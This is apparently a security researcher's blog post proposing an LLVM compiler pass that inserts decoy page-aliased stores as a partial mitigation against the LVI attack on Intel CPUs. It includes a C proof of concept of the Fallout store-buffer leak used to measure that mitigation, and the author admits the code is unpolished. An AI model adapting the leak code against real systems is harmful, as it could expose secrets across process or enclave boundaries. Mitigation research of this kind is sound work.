Bad Bodyguard : How I failed defending against LVI

Recently there were many researches about microarchitectural attacks on Intel CPU Family. Some of the attacks rely on uarc buffers of the specific microarchitectures (RIDL, Fallout, ZombieLoad, LVI). All these attacks are summarized with the name "MDS"(Microarchitectural Data Sampling). LVI was the latest(I do not consider CrossTalk and Cacheout/SGAxe as separates attack, because of they are advanced variants of RIDL) attack among others and unlike previous attacks (which primarily were targeting data leak) targeted specifically the data injection to victim security domain. Original authors of the paper and CPU vendors suggested patch for GCC compilers, which was putting LFENCE after each load to prevent the uarch injection to the load. I am not going to explain how LVI works, you always can read the paper.

What I am focusing here is presenting cheap (but not 100%) defense against LVI. In fact, LVI rely on different primitives to perform an injection (Store-To-Load, LFB entry fetch, LoadBuffer entry fetch). It means that The source of uarch leak could be any of uarch buffers. However, we noted that on practice each time if conditions for Store-To-Load match, there is no other leak (the only leak comes from the Store Buffer). We can't confirm that there is any sort of priority in uarch data flow by design, however empirically we see that it looks very much like that.

So, the idea of defending against LVI is based on assumption, that we know how uarch data flow is prioritized: If at the time of assisted(faulted) load there is prior Store in StoreBuffer with lowest 12 bit match(this is called page aliasing) in STA(StoreAddress) field - StoreBuffer becomes the source of the injection.

So the solution is very simplistic - lets try to put benign store instruction in the code, in order to make these store instructions become source of the leak(like a bodyguard :)) for any uarch injection. We could make it with two approaches here:

Support each store in the existing code with store to the page aliased address. This approach specifically targets the LVI threat model. Since we assume that when we perform the context switch (to other address space or into SGX enclave) uarch buffers are drained due to uarch patch (for VERW,EENTER,EEXIT instructions). So authors of LVI explain that they rely on uarch poisoning from the inside of the victim space (victim has to bring the attacker controlled data into some of the buffers and then value will be incorrectly passed to some instruction transiently during microcode assist procedure). So, if we instrument each store instruction and add new store into separate data section but with the same lowest 12 bit match, we eliminate all leaks from store buffer with high chances. The problem here is that there can be race condition, when STA and STD of the original store ist committed, when STA or STD of the instrumented store is still not, so the original data can leak.
Support each load instruction with store instruction to the aliasing address. We could instrument each load instruction to have a store right before into the aliasing location. The advantage of this approach is that we basically turn most of leaks into the load instruction into store-to-leak behaviour, since it is prioritized (according to our assumption). Hence, there will be no leakage from LFB or LoadBuffer with high chances. The problem here is that there can be reordering between store and following load. Also it could be that when store and load are executed concurrently, during ucode assist of the load instruction - STA and STD entry of the store are still not valid. In this situation no benign leak could be done.

Each of the presented approach cannot defend the LVI in 100%, however these solutions are rising the bar and make LVI on practice much harder. To show, that it is the case I present some minimalistic proof of concept solution of such instrumenting in LLVM (Find source code below). But don't expect this code run straightly, I was experimenting some time ago and might forget to change something. I experimented with Skylake (Intel Core I7 6700K)

LLVM Backend Pass:

#include "X86.h"
#include "X86InstrBuilder.h"
#include "X86InstrInfo.h"
#include "X86Subtarget.h"
#include "llvm/ADT/ArrayRef.h"
#include "llvm/ADT/DenseMap.h"
#include "llvm/ADT/Optional.h"
#include "llvm/ADT/STLExtras.h"
#include "llvm/ADT/ScopeExit.h"
#include "llvm/ADT/SmallPtrSet.h"
#include "llvm/ADT/SmallSet.h"
#include "llvm/ADT/SmallVector.h"
#include "llvm/ADT/SparseBitVector.h"
#include "llvm/ADT/Statistic.h"
#include "llvm/ExecutionEngine/SectionMemoryManager.h"
#include "llvm/CodeGen/MachineBasicBlock.h"
#include "llvm/CodeGen/MachineConstantPool.h"
#include "llvm/CodeGen/MachineFunction.h"
#include "llvm/CodeGen/MachineFunctionPass.h"
#include "llvm/CodeGen/MachineInstr.h"
#include "llvm/CodeGen/MachineInstrBuilder.h"
#include "llvm/CodeGen/MachineModuleInfo.h"
#include "llvm/CodeGen/MachineOperand.h"
#include "llvm/CodeGen/MachineRegisterInfo.h"
#include "llvm/CodeGen/MachineSSAUpdater.h"
#include "llvm/CodeGen/TargetInstrInfo.h"
#include "llvm/CodeGen/TargetRegisterInfo.h"
#include "llvm/CodeGen/TargetSchedule.h"
#include "llvm/CodeGen/TargetSubtargetInfo.h"
#include "llvm/IR/DebugLoc.h"
#include "llvm/MC/MCSchedule.h"
#include "llvm/Pass.h"
#include "llvm/Support/CommandLine.h"
#include "llvm/Support/Debug.h"
#include "llvm/Support/raw_ostream.h"
#include <algorithm>
#include <cassert>
#include <iterator>
#include <utility>

#define X86_CACHELINE_SIZE (64L)
using namespace llvm;

#define PASS_KEY "x86-strstr"
#define DEBUG_TYPE PASS_KEY

sys::MemoryBlock SpeculativeMemoryEraserBlock;

static cl::opt<bool> StoreToLeak(
    "x86-loadtoleak", cl::Hidden,
    cl::desc("X86: Load-to-Leak hardening; otherwise Store-To-Leak."), cl::init(false));


static cl::opt<bool> LVI_mitigation(
    "x86-lviprotect", cl::Hidden,
    cl::desc("X86: Mitigate against LVI attack"), cl::init(false));
namespace {

class X86StoreStore : public MachineFunctionPass {
public:

const X86Subtarget *Subtarget;
  MachineRegisterInfo *MRI;
  const X86InstrInfo *TII;
  const TargetRegisterInfo *TRI;

  X86StoreStore() : MachineFunctionPass(ID) {
      std::error_code EC;
      if(EC){
        ExitOnError();
      }
      SpeculativeMemoryEraserBlock = sys::Memory::allocateMappedMemory(
        4096, nullptr, sys::Memory::MF_READ | sys::Memory::MF_WRITE, EC);
      // vaddr_base = SectionMemoryManager::allocateSection(SectionMemoryManager::AllocationPurpose::RWData, 4096, 4096);
  }

  StringRef getPassName() const override {
    return "X86 stored stores";
  }
  bool runOnMachineFunction(MachineFunction &MF) override;

  /// Pass identification, replacement for typeid.
  static char ID;
// public:
  uint64_t vaddr_base;
  void visitMovInstr(MachineInstr* MI, MachineFunction &MF);
  void visitMovInstr2(MachineInstr* MI, MachineFunction &MF);
  void visitCall(MachineInstr* MI, MachineFunction &MF);
  void visitReturn(MachineInstr* MI, MachineFunction &MF);
  bool mayReadMemory(const MachineInstr& MI){
    return MI.mayLoad() && (MI.isMoveImmediate() || MI.isMoveReg() || isStackLoad(MI)); //|| isPush(MI) || MI.isInlineAsm();
  }

  bool mayModifyMemory(const MachineInstr& MI){
    return MI.mayStore() && (MI.isMoveImmediate() || MI.isMoveReg() || isStackStore(MI)); //|| isPush(MI) || MI.isInlineAsm();
  }

  bool isStackStore(const MachineInstr& MI){
    switch(MI.getOpcode()){
      case X86::PUSH16i8:
      case X86::PUSH16r:
      case X86::PUSH16rmm:
      case X86::PUSH16rmr:
      case X86::PUSH32i8:
      case X86::PUSH32r:
      case X86::PUSH32rmm:
      case X86::PUSH32rmr:
      case X86::PUSH64i32:
      case X86::PUSH64i8:
      case X86::PUSH64r:
      case X86::PUSH64rmm:
      case X86::PUSH64rmr:
      case X86::PUSHA16:
      case X86::PUSHA32:
      case X86::PUSHCS16:
      case X86::PUSHCS32:
      case X86::PUSHDS16:
      case X86::PUSHDS32:
      case X86::PUSHES16:
      case X86::PUSHES32:
      case X86::PUSHF16:
      case X86::PUSHF32:
      case X86::PUSHF64:
      case X86::PUSHFS16:
      case X86::PUSHFS32:
      case X86::PUSHFS64:
      case X86::PUSHGS16:
      case X86::PUSHGS32:
      case X86::PUSHGS64:
      case X86::PUSHSS16:
      case X86::PUSHSS32:
      case X86::PUSHi16:
      case X86::PUSHi32:
        return true;
      default:
        return false;
    }
  }

  bool isStackLoad(const MachineInstr& MI){
    switch(MI.getOpcode()){
      case X86::POP16r:
      case X86::POP16rmm:
      case X86::POP16rmr:
      case X86::POP32r:
      case X86::POP32rmm:
      case X86::POP32rmr:
      case X86::POP64r:
      case X86::POP64rmm:
      case X86::POP64rmr:
      case X86::POPA16:
      case X86::POPA32:
      case X86::POPDS16:
      case X86::POPDS32:
      case X86::POPES16:
      case X86::POPES32:
      case X86::POPF16:
      case X86::POPF32:
      case X86::POPF64:
      case X86::POPFS16:
      case X86::POPFS32:
      case X86::POPFS64:
      case X86::POPGS16:
      case X86::POPGS32:
      case X86::POPGS64:
      case X86::POPSS16:
      case X86::POPSS32:
        return true;
      default:
        return false;
    }
  }

};

} // end anonymous namespace



static void (X86StoreStore::*instrumentation)(MachineInstr* MI, MachineFunction &MF) = &X86StoreStore::visitMovInstr;
static bool (X86StoreStore::*needsInstrumentation)(const MachineInstr& MI) = &X86StoreStore::mayModifyMemory;
static bool (X86StoreStore::*isStackInstr)(const MachineInstr &MI) = &X86StoreStore::isStackStore;

char X86StoreStore::ID = 0;
bool X86StoreStore::runOnMachineFunction(
    MachineFunction &MF) {
  LLVM_DEBUG(dbgs() << "********** " << getPassName() << " : " << MF.getName()
                    << " **********\n");
  Subtarget = &MF.getSubtarget<X86Subtarget>();
  TII = Subtarget->getInstrInfo();
  MRI = &MF.getRegInfo();
  bool firstInstr = true;
  std::vector<MachineInstr*> vectr;
  if(!LVI_mitigation)
    return false;
  if(StoreToLeak){
    instrumentation = &X86StoreStore::visitMovInstr2;
    needsInstrumentation = &X86StoreStore::mayReadMemory;
    isStackInstr = &X86StoreStore::isStackLoad;
  }


  // BuildMI(*MF.begin(), (*MF.begin()).begin(), DebugLoc(), TII->get(X86::XCHG64rm), UndefReg)
  // .addExternalSymbol(/* disp */"__llvm_store_store_shadow_area"); // function starts with lfence
  for(auto& MBB : MF){
    for(auto& MI : MBB){
      SmallVector<const MachineMemOperand *, 1> accss;
      if((this->*(needsInstrumentation))(MI) || MI.isReturn() || MI.isCall()) vectr.push_back(&MI);
      firstInstr = false;
    }
  }

  for(auto *MI : vectr){
    // if((this->*(isMoveInstr))(*MI)){
      if(MI->isCall())
        visitCall(MI, MF);
      else if(MI->isReturn())
        visitReturn(MI, MF);
      else
        (this->*(instrumentation))(MI, MF);
    // BuildMI(*(MI->getParent()), std::next(MI->getIterator()), DebugLoc(), TII->get(X86::LFENCE));
    // }
  }
  return true;
}



void X86StoreStore::visitCall(MachineInstr* MI, MachineFunction &MF){
  unsigned MemOpOffset = X86II::getMemoryOperandNo(MI->getDesc().TSFlags);;
  unsigned Bias = X86II::getOperandBias(MI->getDesc());
  Register UndefReg = X86::R15; //MRI->createVirtualRegister(&X86::GR64RegClass);
  MachineInstrBuilder MIB;
  MemOpOffset += Bias;
  return;
  if(MemOpOffset < 0) return; // lets not change anything
  BuildMI(*(MI->getParent()), MI->getIterator(), DebugLoc(), TII->get(X86::LEA64r), UndefReg)
      .addReg(MI->getOperand(MemOpOffset + X86::AddrBaseReg).getReg())
      .addImm(MI->getOperand(MemOpOffset + X86::AddrScaleAmt).getImm())
      .addReg(MI->getOperand(MemOpOffset + X86::AddrIndexReg).getReg())
      .addImm(MI->getOperand(MemOpOffset + X86::AddrDisp).getImm())
      .addReg(MI->getOperand(MemOpOffset + X86::AddrSegmentReg).getReg());



  BuildMI(*(MI->getParent()), MI->getIterator(), DebugLoc(), TII->get(X86::AND64ri32), UndefReg)
  .addReg(UndefReg)
  .addImm(0xFFF);

  BuildMI(*(MI->getParent()), MI->getIterator(), DebugLoc(), TII->get(X86::MOV64mi32))
  .addReg(/* base */ UndefReg)
  .addImm(/* scale */ 1)
  .addImm(/* index */ 0)
  .addExternalSymbol(/* disp */"__llvm_store_store_shadow_area")
  .addImm(/* segment */ 0)
  .addImm(0xFFFFFFFF);

  BuildMI(*(MI->getParent()), MI->getIterator(), DebugLoc(), TII->get(X86::SFENCE));

  // Second write must not trigger page aliasing
  BuildMI(*(MI->getParent()), MI->getIterator(), DebugLoc(), TII->get(X86::ADD64ri32), UndefReg)
  .addReg(UndefReg)
  .addImm(X86_CACHELINE_SIZE);
  BuildMI(*(MI->getParent()), MI->getIterator(), DebugLoc(), TII->get(X86::AND64ri32), UndefReg)
  .addReg(UndefReg)
  .addImm(0xFFF);

  BuildMI(*(MI->getParent()), MI->getIterator(), DebugLoc(), TII->get(X86::MOV64mi32))
  .addReg(/* base */ UndefReg)
  .addImm(/* scale */ 1)
  .addImm(/* index */ 0)
  .addExternalSymbol(/* disp */"__llvm_store_store_shadow_area2")
  .addImm(/* segment */ 0)
  .addImm(0xFFFFFFFF);

};


void X86StoreStore::visitReturn(MachineInstr* MI, MachineFunction &MF){
  Register UndefReg = X86::R15; //MRI->createVirtualRegister(&X86::GR64RegClass);
  MachineInstrBuilder MIB;

  MIB = BuildMI(*(MI->getParent()), MI->getIterator(), DebugLoc(), TII->get(X86::LEA64r), UndefReg)
      .addReg(X86::RSP)
      .addImm(1)
      .addImm(0)
      .addImm(-8)
      .addImm(0);



  BuildMI(*(MI->getParent()), MI->getIterator(), DebugLoc(), TII->get(X86::AND64ri32), UndefReg)
  .addReg(UndefReg)
  .addImm(0xFFF);

  BuildMI(*(MI->getParent()), MI->getIterator(), DebugLoc(), TII->get(X86::MOV64mi32))
  .addReg(/* base */ UndefReg)
  .addImm(/* scale */ 1)
  .addImm(/* index */ 0)
  .addExternalSymbol(/* disp */"__llvm_store_store_shadow_area")
  .addImm(/* segment */ 0)
  .addImm(0xFFFFFFFF);

  BuildMI(*(MI->getParent()), MI->getIterator(), DebugLoc(), TII->get(X86::SFENCE));

  // Second write must not trigger page aliasing
  BuildMI(*(MI->getParent()), MI->getIterator(), DebugLoc(), TII->get(X86::ADD64ri32), UndefReg)
  .addReg(UndefReg)
  .addImm(X86_CACHELINE_SIZE);
  BuildMI(*(MI->getParent()), MI->getIterator(), DebugLoc(), TII->get(X86::AND64ri32), UndefReg)
  .addReg(UndefReg)
  .addImm(0xFFF);

  BuildMI(*(MI->getParent()), MI->getIterator(), DebugLoc(), TII->get(X86::MOV64mi32))
  .addReg(/* base */ UndefReg)
  .addImm(/* scale */ 1)
  .addImm(/* index */ 0)
  .addExternalSymbol(/* disp */"__llvm_store_store_shadow_area")
  .addImm(/* segment */ 0)
  .addImm(0xFFFFFFFF);

};

void X86StoreStore::visitMovInstr(MachineInstr* MI, MachineFunction &MF){
  unsigned MemOpOffset = X86II::getMemoryOperandNo(MI->getDesc().TSFlags);;
  unsigned Bias = X86II::getOperandBias(MI->getDesc());
  Register UndefReg = X86::R15; //MRI->createVirtualRegister(&X86::GR64RegClass);
  MachineInstrBuilder MIB;
  MemOpOffset += Bias;
  if(MemOpOffset < 0) return; // lets not change anything
  if(!(this->*(isStackInstr))(*MI)){
    MIB = BuildMI(*(MI->getParent()), std::next(MI->getIterator()), DebugLoc(), TII->get(X86::LEA64r), UndefReg)
        .addReg(MI->getOperand(MemOpOffset + X86::AddrBaseReg).getReg())
        .addImm(MI->getOperand(MemOpOffset + X86::AddrScaleAmt).getImm())
        .addReg(MI->getOperand(MemOpOffset + X86::AddrIndexReg).getReg())
        .addImm(MI->getOperand(MemOpOffset + X86::AddrDisp).getImm())
        .addReg(MI->getOperand(MemOpOffset + X86::AddrSegmentReg).getReg());
  } else {
  MIB = BuildMI(*(MI->getParent()), std::next(MI->getIterator()), DebugLoc(), TII->get(X86::LEA64r), UndefReg)
        .addReg(X86::RSP)
        .addImm(1)
        .addImm(0)
        .addImm(-8)
        .addImm(0);
  }
  MIB = BuildMI(*(MI->getParent()), std::next(MIB.getInstr()->getIterator()), DebugLoc(), TII->get(X86::AND64ri32), UndefReg)
  .addReg(UndefReg)
  .addImm(0xFFF);

  MIB = BuildMI(*(MI->getParent()), std::next(MIB.getInstr()->getIterator()), DebugLoc(), TII->get(X86::MOV64mi32))
  .addReg(/* base */ UndefReg)
  .addImm(/* scale */ 1)
  .addImm(/* index */ 0)
  .addExternalSymbol(/* disp */"__llvm_store_store_shadow_area")
  .addImm(/* segment */ 0)
  .addImm(0xFFFFFFFF);

  MIB = BuildMI(*(MI->getParent()), std::next(MIB.getInstr()->getIterator()), DebugLoc(), TII->get(X86::SFENCE));

  // Second write must not trigger page aliasing
  MIB = BuildMI(*(MI->getParent()), std::next(MIB.getInstr()->getIterator()), DebugLoc(), TII->get(X86::ADD64ri32), UndefReg)
  .addReg(UndefReg)
  .addImm(X86_CACHELINE_SIZE);
  MIB = BuildMI(*(MI->getParent()), std::next(MIB.getInstr()->getIterator()), DebugLoc(), TII->get(X86::AND64ri32), UndefReg)
  .addReg(UndefReg)
  .addImm(0xFFF);

  BuildMI(*(MI->getParent()), std::next(MIB.getInstr()->getIterator()), DebugLoc(), TII->get(X86::MOV64mi32))
  .addReg(/* base */ UndefReg)
  .addImm(/* scale */ 1)
  .addImm(/* index */ 0)
  .addExternalSymbol(/* disp */"__llvm_store_store_shadow_area")
  .addImm(/* segment */ 0)
  .addImm(0xFFFFFFFF);

}


void X86StoreStore::visitMovInstr2(MachineInstr* MI, MachineFunction &MF){
  unsigned MemOpOffset = X86II::getMemoryOperandNo(MI->getDesc().TSFlags);;
  unsigned Bias = X86II::getOperandBias(MI->getDesc());
  Register UndefReg = X86::R15; //MRI->createVirtualRegister(&X86::GR64RegClass);
  MachineInstrBuilder MIB;
  MemOpOffset += Bias;
  if(MemOpOffset < 0) return; // lets not change anything
  if(!(this->*(isStackInstr))(*MI)){
    BuildMI(*(MI->getParent()), MI->getIterator(), DebugLoc(), TII->get(X86::LEA64r), UndefReg)
        .addReg(MI->getOperand(MemOpOffset + X86::AddrBaseReg).getReg())
        .addImm(MI->getOperand(MemOpOffset + X86::AddrScaleAmt).getImm())
        .addReg(MI->getOperand(MemOpOffset + X86::AddrIndexReg).getReg())
        .addImm(MI->getOperand(MemOpOffset + X86::AddrDisp).getImm())
        .addReg(MI->getOperand(MemOpOffset + X86::AddrSegmentReg).getReg());
  } else {
    MIB = BuildMI(*(MI->getParent()), MI->getIterator(), DebugLoc(), TII->get(X86::LEA64r), UndefReg)
        .addReg(X86::RSP)
        .addImm(1)
        .addImm(0)
        .addImm(-8)
        .addImm(0);
  }


  BuildMI(*(MI->getParent()), MI->getIterator(), DebugLoc(), TII->get(X86::AND64ri32), UndefReg)
  .addReg(UndefReg)
  .addImm(0xFFF);

  BuildMI(*(MI->getParent()), MI->getIterator(), DebugLoc(), TII->get(X86::MOV64mi32))
  .addReg(/* base */ UndefReg)
  .addImm(/* scale */ 1)
  .addImm(/* index */ 0)
  .addExternalSymbol(/* disp */"__llvm_store_store_shadow_area")
  .addImm(/* segment */ 0)
  .addImm(0xFFFFFFFF);

  BuildMI(*(MI->getParent()), MI->getIterator(), DebugLoc(), TII->get(X86::SFENCE));

  // Second write must not trigger page aliasing
  BuildMI(*(MI->getParent()), MI->getIterator(), DebugLoc(), TII->get(X86::ADD64ri32), UndefReg)
  .addReg(UndefReg)
  .addImm(X86_CACHELINE_SIZE);
  BuildMI(*(MI->getParent()), MI->getIterator(), DebugLoc(), TII->get(X86::AND64ri32), UndefReg)
  .addReg(UndefReg)
  .addImm(0xFFF);

  BuildMI(*(MI->getParent()), MI->getIterator(), DebugLoc(), TII->get(X86::MOV64mi32))
  .addReg(/* base */ UndefReg)
  .addImm(/* scale */ 1)
  .addImm(/* index */ 0)
  .addExternalSymbol(/* disp */"__llvm_store_store_shadow_area")
  .addImm(/* segment */ 0)
  .addImm(0xFFFFFFFF);
}

INITIALIZE_PASS_BEGIN(X86StoreStore, PASS_KEY,
                      "X86 stored stores", false, false)

INITIALIZE_PASS_END(X86StoreStore, PASS_KEY,
                    "X86 stored stores", false, false)


FunctionPass *llvm::createX86StoreStorePass() {
  return new X86StoreStore();
}

Note: I reserved GPRP Register R15 for this instrumentation. You also have to link your code then withsomething like this:

.comm __llvm_store_store_shadow_area, 8192, 4096

Results: To test it I used simple PoC of the Fallout attack (Find source code below):

#include <stdlib.h>
#include <stdio.h>
#include <immintrin.h>
#include <sys/time.h>
#include <stdint.h>
#include <time.h>
#include <string.h>
#include <sched.h>
#include <unistd.h>
#include <x86intrin.h>
#include <sys/mman.h>
#include <fcntl.h>
#define __USE_GNU
#include <signal.h>
#include <ucontext.h>
#define PG_SIZE (4096U*1)

volatile char *oraclearr;
volatile char *shdworaclearr;
volatile unsigned *tmp_store;
volatile unsigned char* addr1;
volatile unsigned char* addr2;
volatile unsigned char* addr3;

int tlb_fd;
int shadow_offset[1024];
const int offset = 0xfa;
int shadow_offset[1024];
int shift = 0;
volatile unsigned char store_buffer[4096*STORE_BUFFER_ENTRIES] __attribute__((aligned(4096)));
uint64_t averg[256];
int64_t averg_rnd[256];

void tlb_flush_all(){
    pwrite(tlb_fd, 0x0, 100, 0x0);
}

void clear_accessed_bit(void* vaddr){
    pwrite(tlb_fd, vaddr, 100, 0x0);
}

static inline void clflush(void* addr){
    // __asm__ __volatile__ ("\tclflush (%0)\n"::"r"(addr));
    asm volatile("\tclflush (%0)\n" : :"r"(addr) : "memory");
}

void __attribute__((optimize("-O0")))void_operations3(volatile char* a, volatile unsigned char* b){
    addr1[offset] = 0xe1; // injection
    oraclearr[PG_SIZE * addr3[offset]];
    oraclearr[PG_SIZE * addr3[offset]];
    oraclearr[PG_SIZE * addr2[offset]]; // access to addr2 is ucode-assisted
    oraclearr[PG_SIZE * addr2[offset]];

};

static unsigned long long rdtscp() {
    unsigned long long a, d;
    asm volatile ("rdtscp" : "=a" (a), "=d" (d) : : "rcx");
    a = (d<<32) | a;
    return a;
}

uint64_t time_access(volatile void* add){
    uint64_t t1, t2;
    volatile char *f = (volatile char*)add;
    // for(int i=0; i < 12; ++i)sched_yield();
    t1 = rdtscp();
    *f;
    t2 = rdtscp();
    return (t2 - t1);
}

int  __attribute__((optimize("-O0")))main(void){
    register char loaded_val;
    volatile char *f;
    int64_t a = 100000000,b = 100;

    addr1 = (char*)(((uint64_t)malloc(200*PG_SIZE) + PG_SIZE) & ~0xFFF );
    addr2 = (char*)(((uint64_t)malloc(200*PG_SIZE) + PG_SIZE) & ~0xFFF );
    addr3 = (char*)(((uint64_t)malloc(200*PG_SIZE) + PG_SIZE) & ~0xFFF );
    tlb_fd = open("/dev/tlb_invalidator", O_WRONLY, 0x0);
    if(tlb_fd == -1){
        printf("FILE DOESNT EXIST\n");
    return 1;
    }
    oraclearr = malloc(sizeof(char) * PG_SIZE*1024);
    // EVERYTHING IS INITIALIZED
experiments_:
    // printf("Running experiments\n");
    memset(averg_rnd, 0x0, 256*sizeof(int64_t));
    memset(averg, 0x0, 256*sizeof(uint64_t));
    memset(oraclearr, 0x1,  PG_SIZE*1024);

    addr3[offset] = 0x34;
    addr2[offset] = 0x34;
    addr1[offset] = 0xf1;
    for(int rnd_i = 0; rnd_i < NUM_ROUNDS; ++rnd_i){
        memset(averg, 0x0, 256*sizeof(uint64_t));
        for(int i = 0; i < NUM_EXPR; ++i){
            // evict_full_cache();
            int flag = 0;
            shift = 0;
            for(unsigned int j = 0; j < 256; ++j){
                asm volatile("\tclflush (%0)\n"::"r"((void*)&oraclearr[PG_SIZE * j]));
            }

            clear_accessed_bit((void*)&addr2[offset]);
            asm volatile("\tclflush (%0)\n"::"r"((void*)&addr2[offset]));
            tlb_flush_all();
            void_operations3(&a, &b);
            for(unsigned int j = 0; j < 256; ++j){
                averg[j] += time_access((void*)(oraclearr + PG_SIZE * j));
            }
        }
        uint64_t min = (uint64_t)-1;
        int minid = -1;
        for(int rn = 0; rn < 256; ++rn){
            if((averg[rn]/NUM_EXPR) <= (min - 1) && rn > 0 && rn != addr3[offset]){
                min = averg[rn]/NUM_EXPR;
                minid = rn;
            }
        }
        ++averg_rnd[minid];
    }
    int winner;
    int64_t winner_max = -1;
    int64_t winner_min = 0xfffffffe;
    for(int i = 0; i < 256; ++i){
        if(averg_rnd[i] > winner_max){
            winner_max = averg_rnd[i];
            winner = i;
        }
        if(averg_rnd[i] < winner_min){
            winner_min = averg_rnd[i];
        }
    }
    if(averg[winner]>= 200) {
        goto experiments_;
    }
    printf("0x%02x\n", winner, winner);
    return 1;
}

Current PoC is targeting into leaking secret from the same address space (just like the case with LVI when victim process/enclave handles the user-controlled data and then injects it transiently somewhere). I am not going to explain how the Fallout works, but briefly speaking - injection occurs at void_operations3 function. When we write into addr1[offset] - we create entry in StoreBuffer with some address. Later we try to dereference the addr2[offset], since it is aliasing address, but access to it needs ucode-assist(because of we drop the accessed bit and flush TLB), this access will have to be redispatched, however the firstly dispatched instruction will be fed with the content of the latest store into addr1[offset] (WOW), because of the lowest 12 bit match of addresses. If we instrument this code with our pass, each load will be supported with different store and now lets compare the leak rate with both versions (instrumented and not-instrumented):

not instrumented code		instrumented code
917/1000		0/1000

In the second case(instrumented code) I observed actually 926/1000 a benign value(the one we inject intentionally) to be leaked. I performed 10 full run per each case and took the average (in case of instrumented code, I never saw the leak of the application data).

You may notice, that in current example I use Store-To-Leak to beat the Store-To-Leak behaviour. What about LFB and LoadBuffer leaks? As you can see, with this instrumentation there are no almost any leak from other sources, it is(almost) always the store buffer, which passes the value transiently.

I don't do any deep performance benchmark here. It is very much obvious, that supporting each load with store into the location is cheaper that lfence. Especially stores in location which is very likely to be in L1, because of all accesses occur within the page(since we have only one page for page aliasing) L1 hardware prefetcher will also help here. But microbenchmark show that it is 3-4 times faster (I used tight loop with loads for microbenchmark).

As I mentioned - it is not 100% way to defend your application against LVI, but it definitely makes it harder to inject attacker-controlled data into the victim's space.

References

I am lazy, so you can lookup all MDS papers here : MDS Attacks

References

social